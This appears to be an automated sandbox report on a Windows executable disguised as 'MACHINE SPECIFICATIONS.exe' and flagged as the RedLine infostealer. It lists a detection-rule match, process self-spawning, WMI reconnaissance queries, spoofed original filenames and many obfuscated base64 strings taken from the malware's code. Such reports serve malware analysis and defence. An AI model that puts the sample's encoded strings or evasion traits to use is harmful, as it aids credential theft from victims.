Source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F77180	0_2_00F77180
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F70498	0_2_00F70498
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7959B	0_2_00F7959B
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7D6A8	0_2_00F7D6A8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F759C8	0_2_00F759C8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F79B30	0_2_00F79B30
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F71E28	0_2_00F71E28
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7E140	0_2_00F7E140
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7F4B8	0_2_00F7F4B8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F795A8	0_2_00F795A8
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00F7DB49	0_2_00F7DB49
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_012EDE10	3_2_012EDE10
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_012ED2F0	3_2_012ED2F0
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_05107100	3_2_05107100
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_05101D98	3_2_05101D98
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_0510BE80	3_2_0510BE80
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 3_2_05102610	3_2_05102610

Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.282869112.0000000003971000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameZakrytyeKupla.exe< vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000000.240773724.00000000001EE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNerdbank.Streams.dllB vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280250808.0000000002B3F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTLBS Awx.exe2 vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTLBS Awx.exe2 vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTLBS Awx.exe2 vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000000.258927956.00000000001EE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNerdbank.Streams.dllB vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l,\\StringFileInfo\\040904B0\\OriginalFilename vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTLBS Awx.exe2 vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs MACHINE SPECIFICATIONS.exe
Source: MACHINE SPECIFICATIONS.exe	Binary or memory string: OriginalFilenameNerdbank.Streams.dllB vs MACHINE SPECIFICATIONS.exe

Source: MACHINE SPECIFICATIONS.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: MACHINE SPECIFICATIONS.exe

ReversingLabs: Detection: 26%

Source: MACHINE SPECIFICATIONS.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe"
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Process created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB32C.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@4/27@2/1

Source: MACHINE SPECIFICATIONS.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: MACHINE SPECIFICATIONS.exe, F2K4H9Do/BLAH9rKG<T>.cs	Base64 encoded string: 'UG5xanBsaWkobWVufy1gYGQxYHZkZ3NkfXduO309aH5MSEYDVEpVTlxARUUMREAPRFlbQBRGU0ZNXFRYWRM=', 'UG5xanBsaWkoZH94eC1gYGQxcHY0cHdldHB/aTxpdn5OAUFWVldDSVwJWkRfRFpGX18c', 'Q2BsbWtxJmZsf2tlb2gubXV3fWFxNXd0aWxzaXVzeT9NRE9MVlwI'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/GIvLnvDI.cs	Base64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/B8so5E1H.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/u0039yZFJW1I.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/ru3Dvuv4.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/nyIyFqAH.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/sp1DLLAK.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/u003945nHI75.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/DsC95IW8.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/L1vs6o7t.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/FuvtBB8E.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/u0039Bs7B26E.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/JKGBAy4L.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: MACHINE SPECIFICATIONS.exe, EEuW4yL5/Evy8ZFZv.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, F2K4H9Do/BLAH9rKG<T>.cs	Base64 encoded string: 'UG5xanBsaWkobWVufy1gYGQxYHZkZ3NkfXduO309aH5MSEYDVEpVTlxARUUMREAPRFlbQBRGU0ZNXFRYWRM=', 'UG5xanBsaWkoZH94eC1gYGQxcHY0cHdldHB/aTxpdn5OAUFWVldDSVwJWkRfRFpGX18c', 'Q2BsbWtxJmZsf2tlb2gubXV3fWFxNXd0aWxzaXVzeT9NRE9MVlwI'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/L1vs6o7t.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/B8so5E1H.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/u003945nHI75.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/DsC95IW8.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/u0039yZFJW1I.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/ru3Dvuv4.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/nyIyFqAH.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/JKGBAy4L.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/Evy8ZFZv.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/sp1DLLAK.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/GIvLnvDI.cs	Base64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
Source: 0.2.MACHINE SPECIFICATIONS.exe.100000.0.unpack, EEuW4yL5/FuvtBB8E.cs	Base64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
